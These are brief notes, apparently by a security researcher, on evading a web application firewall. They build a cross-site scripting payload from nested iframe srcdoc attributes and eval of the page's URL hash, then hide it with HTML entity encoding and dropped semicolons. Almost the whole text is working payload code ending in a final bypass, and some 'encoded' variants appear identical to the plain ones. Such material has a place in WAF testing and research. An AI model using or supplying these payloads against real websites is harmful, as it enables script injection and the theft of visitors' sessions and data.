<svg>\n<script>\nand all events (e.g. onload, onerror, onclick, etc...)\neval, alert, prompt, confirm, etc...\n
<iframe src="" srcdoc="">
but blocked:
<iframe src="%09javascript">\n<iframe src="data">\n<iframe srcdoc="<script">\n<iframe srcdoc="<script">\netc...\n
first step
i will use two iframes, so i need two `parent` in payload.
<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>
second step
<iframe srcdoc="<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>"></iframe>
change first char in `script` and `eval` to hex code
<iframe srcdoc="<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>"></iframe>
or dec code <iframe srcdoc="<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>"></iframe>
this payload blocked, waf decode `&#` and `&#x` but... change `&` or `#` or `x` to code
<iframe srcdoc="<iframe srcdoc='<&#x73;cript>&#x65;val(parent.parent.location.hash.substring`1`)</&#x73;cript>'></iframe>"></iframe>
Booom! if a dec is used and there is no digit after the code, then the semicolon is not required
if a hex is used and there is no digit and [a-f] after the code, then the semicolon is not required
if a entities is used and there is no [a-z] after the code, then the semicolon is not required
without semicolon
<iframe srcdoc="<iframe srcdoc='&lt&#115cript>&#x65val(parent.parent.location.hash.substring`1`)</&#115cript>'></iframe>"></iframe>
second booom!